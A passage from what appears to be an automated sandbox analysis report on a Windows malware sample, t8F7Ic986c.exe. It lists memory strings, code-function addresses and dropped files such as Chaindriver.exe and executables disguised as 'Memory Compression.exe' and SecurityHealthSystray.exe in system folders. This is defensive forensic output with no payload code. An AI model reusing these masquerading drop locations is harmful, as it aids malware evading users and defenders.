00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0N
                          Source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1669900462.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://ocsp.digicert.com0O
                          Source: t8F7Ic986c.exe, 00000001.00000002.1667701805.00007FFDFB989000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://python.org/dev/peps/pep-0263/
                          Source: Chaindriver.exe, 00000008.00000002.1728153566.000000000376F000.00000004.00000800.00020000.00000000.sdmp, Memory Compression.exe, 00000025.00000002.1821172623.0000000002D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1669900462.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: t8F7Ic986c.exe, 00000000.00000003.1656647593.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, base_library.zip.0.drString found in binary or memory: http://www.python.org/dev/peps/pep-0205/
                          Source: base_library.zip.0.drString found in binary or memory: http://www.python.org/download/releases/2.3/mro/.
                          Source: t8F7Ic986c.exe, 00000001.00000003.1664116747.0000023EBC700000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1665781347.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000003.1664352524.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                          Source: t8F7Ic986c.exe, 00000001.00000003.1664116747.0000023EBC700000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1666242087.0000023EBDF00000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                          Source: t8F7Ic986c.exe, 00000001.00000003.1664352524.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
                          Source: t8F7Ic986c.exe, 00000001.00000003.1664116747.0000023EBC700000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1665781347.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000003.1664352524.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
                          Source: t8F7Ic986c.exe, 00000001.00000003.1664116747.0000023EBC700000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000002.1665781347.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000001.00000003.1664352524.0000023EBC68D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1669900462.000001A2123B2000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1658580521.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123AF000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1655924578.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656330842.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123AC000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656071872.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1657492096.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1659486333.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, t8F7Ic986c.exe, 00000000.00000003.1656219282.000001A2123A5000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr, _hashlib.pyd.0.dr, libcrypto-1_1.dll.0.dr, _bz2.pyd.0.dr, _lzma.pyd.0.dr, unicodedata.pyd.0.drString found in binary or memory: https://www.digicert.com/CPS0
                          Source: libcrypto-1_1.dll.0.drString found in binary or memory: https://www.openssl.org/H
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C035C300: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF6C035C300
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMPJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCE25282B3313D430FBB6BBFE2CFE4882.TMPJump to behavior
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652ED7B600_2_00007FF652ED7B60
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EF6B500_2_00007FF652EF6B50
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EF7A9C0_2_00007FF652EF7A9C
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652ED10000_2_00007FF652ED1000
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652ED9D9B0_2_00007FF652ED9D9B
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE86700_2_00007FF652EE8670
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE84BC0_2_00007FF652EE84BC
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EEECA00_2_00007FF652EEECA0
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE24800_2_00007FF652EE2480
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EEAC500_2_00007FF652EEAC50
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EEF3200_2_00007FF652EEF320
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE42D40_2_00007FF652EE42D4
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652ED92D00_2_00007FF652ED92D0
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE2A940_2_00007FF652EE2A94
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EF17200_2_00007FF652EF1720
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE22740_2_00007FF652EE2274
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EF4A600_2_00007FF652EF4A60
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EEE80C0_2_00007FF652EEE80C
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EFA7D80_2_00007FF652EFA7D8
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE86700_2_00007FF652EE8670
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EDA76D0_2_00007FF652EDA76D
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE67500_2_00007FF652EE6750
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652ED9F3B0_2_00007FF652ED9F3B
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE28900_2_00007FF652EE2890
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE20700_2_00007FF652EE2070
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EF6DCC0_2_00007FF652EF6DCC
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EF75500_2_00007FF652EF7550
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE35400_2_00007FF652EE3540
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EF17200_2_00007FF652EF1720
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EF4EFC0_2_00007FF652EF4EFC
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE8EF40_2_00007FF652EE8EF4
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE3ED00_2_00007FF652EE3ED0
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EF26C40_2_00007FF652EF26C4
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 0_2_00007FF652EE26840_2_00007FF652EE2684
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: 1_2_00007FFE148B75081_2_00007FFE148B7508
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03734044_2_00007FF6C0373404
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C036A46C4_2_00007FF6C036A46C
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03806D44_2_00007FF6C03806D4
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03648E84_2_00007FF6C03648E8
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C035F9404_2_00007FF6C035F940
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C037CE084_2_00007FF6C037CE08
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0355E2C4_2_00007FF6C0355E2C
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0371EA04_2_00007FF6C0371EA0
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C037B1104_2_00007FF6C037B110
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03721504_2_00007FF6C0372150
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03612244_2_00007FF6C0361224
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03572884_2_00007FF6C0357288
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C035A2FC4_2_00007FF6C035A2FC
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C035C3004_2_00007FF6C035C300
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03753704_2_00007FF6C0375370
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03924D04_2_00007FF6C03924D0
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C036B4F04_2_00007FF6C036B4F0
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C035A6644_2_00007FF6C035A664
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03576C04_2_00007FF6C03576C0
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C038C7B84_2_00007FF6C038C7B8
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03548404_2_00007FF6C0354840
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03889204_2_00007FF6C0388920
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C036C9284_2_00007FF6C036C928
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03738E44_2_00007FF6C03738E4
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0361A004_2_00007FF6C0361A00
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C038FA144_2_00007FF6C038FA14
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0372A304_2_00007FF6C0372A30
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0395A784_2_00007FF6C0395A78
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0351AA44_2_00007FF6C0351AA4
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0374B184_2_00007FF6C0374B18
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0365B204_2_00007FF6C0365B20
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0388B9C4_2_00007FF6C0388B9C
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C036BB4C4_2_00007FF6C036BB4C
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0372CD84_2_00007FF6C0372CD8
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03806D44_2_00007FF6C03806D4
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C0378D744_2_00007FF6C0378D74
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C036AED44_2_00007FF6C036AED4
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C03920004_2_00007FF6C0392000
                          Source: C:\Users\user\AppData\Local\Temp\_MEI75042\BoosterX.exeCode function: 4_2_00007FF6C036F1004_2_00007FF6C036F100
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B534047_2_00007FF720B53404
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B4A46C7_2_00007FF720B4A46C
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B606D47_2_00007FF720B606D4
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B3A6647_2_00007FF720B3A664
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B448E87_2_00007FF720B448E8
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B3F9407_2_00007FF720B3F940
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B5CE087_2_00007FF720B5CE08
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B51EA07_2_00007FF720B51EA0
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B35E2C7_2_00007FF720B35E2C
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B5B1107_2_00007FF720B5B110
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B521507_2_00007FF720B52150
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B3A2FC7_2_00007FF720B3A2FC
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B3C3007_2_00007FF720B3C300
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B372887_2_00007FF720B37288
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B412247_2_00007FF720B41224
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B553707_2_00007FF720B55370
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B4B4F07_2_00007FF720B4B4F0
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B724D07_2_00007FF720B724D0
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B376C07_2_00007FF720B376C0
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B6C7B87_2_00007FF720B6C7B8
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B538E47_2_00007FF720B538E4
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B348407_2_00007FF720B34840
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B41A007_2_00007FF720B41A00
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B6FA147_2_00007FF720B6FA14
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B689207_2_00007FF720B68920
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B4C9287_2_00007FF720B4C928
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B31AA47_2_00007FF720B31AA4
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B75A787_2_00007FF720B75A78
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B52A307_2_00007FF720B52A30
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B68B9C7_2_00007FF720B68B9C
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B54B187_2_00007FF720B54B18
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B45B207_2_00007FF720B45B20
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B4BB4C7_2_00007FF720B4BB4C
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B52CD87_2_00007FF720B52CD8
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B58D747_2_00007FF720B58D74
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B606D47_2_00007FF720B606D4
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B4AED47_2_00007FF720B4AED4
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B720007_2_00007FF720B72000
                          Source: C:\Chaindriver.sfx.exeCode function: 7_2_00007FF720B4F1007_2_00007FF720B4F100
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BA20D478_2_00007FFD9BA20D47
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BA20E438_2_00007FFD9BA20E43
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BE265F28_2_00007FFD9BE265F2
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BE191198_2_00007FFD9BE19119
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BE1B8F28_2_00007FFD9BE1B8F2
                          Source: C:\Chaindriver.exeCode function: 8_2_00007FFD9BE258468_2_00007FFD9BE25846
                          Source: C:\Chaindriver.exeCode function: 34_2_00007FFD9BA00D4734_2_00007FFD9BA00D47
                          Source: C:\Chaindriver.exeCode function: 34_2_00007FFD9BA00E4334_2_00007FFD9BA00E43
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA091E935_2_00007FFD9BA091E9
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA0920035_2_00007FFD9BA09200
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA1173B35_2_00007FFD9BA1173B
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA3200435_2_00007FFD9BA32004
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA3A2E435_2_00007FFD9BA3A2E4
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA3E18635_2_00007FFD9BA3E186
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA00D4735_2_00007FFD9BA00D47
                          Source: C:\Chaindriver.exeCode function: 35_2_00007FFD9BA00E4335_2_00007FFD9BA00E43
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA00D4736_2_00007FFD9BA00D47
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA00E4336_2_00007FFD9BA00E43
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA1173B36_2_00007FFD9BA1173B
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA091E936_2_00007FFD9BA091E9
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA0920036_2_00007FFD9BA09200
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA3200436_2_00007FFD9BA32004
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA3A2E436_2_00007FFD9BA3A2E4
                          Source: C:\Recovery\Memory Compression.exeCode function: 36_2_00007FFD9BA3E18636_2_00007FFD9BA3E186
                          Source: C:\Recovery\Memory Compression.exeCode function: 37_2_00007FFD9B9F0D4737_2_00007FFD9B9F0D47
                          Source: C:\Recovery\Memory Compression.exeCode function: 37_2_00007FFD9B9F0E4337_2_00007FFD9B9F0E43
                          Source: C:\Recovery\Memory Compression.exeCode function: 37_2_00007FFD9BDEC4F537_2_00007FFD9BDEC4F5
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA00D4738_2_00007FFD9BA00D47
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA00E4338_2_00007FFD9BA00E43
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA091E938_2_00007FFD9BA091E9
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA0920038_2_00007FFD9BA09200
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA3200438_2_00007FFD9BA32004
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA3A2E438_2_00007FFD9BA3A2E4
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA3E18638_2_00007FFD9BA3E186
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 38_2_00007FFD9BA1173B38_2_00007FFD9BA1173B
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 39_2_00007FFD9BA5200439_2_00007FFD9BA52004
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 39_2_00007FFD9BA5A2E439_2_00007FFD9BA5A2E4
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 39_2_00007FFD9BA5E18639_2_00007FFD9BA5E186
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 39_2_00007FFD9BA3173039_2_00007FFD9BA31730
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 39_2_00007FFD9BA20D4739_2_00007FFD9BA20D47
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 39_2_00007FFD9BA20E4339_2_00007FFD9BA20E43
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 39_2_00007FFD9BA2920039_2_00007FFD9BA29200
                          Source: C:\Chaindriver.exeCode function: 42_2_00007FFD9B9E0D4742_2_00007FFD9B9E0D47
                          Source: C:\Chaindriver.exeCode function: 42_2_00007FFD9B9E0E4342_2_00007FFD9B9E0E43
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 48_2_00007FFD9BA10D4748_2_00007FFD9BA10D47
                          Source: C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exeCode function: 48_2_00007FFD9BA10E4348_2_00007FFD9BA10E43
                          Source: C:\Users\user\Desktop\t8F7Ic986c.exeCode function: String function: 00007FF652ED2B10 appears 47 times
                          Source: t8F7Ic986c.exe, 00000000.00000003.1659338173.000001A2123B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000000.00000003.1656458098.000001A2123A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs t8F7Ic986c.exe
                          Source: t8F7Ic986c.exe, 00000000.00000003.1669900462.000001A2123B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs t8F7Ic986c.exe
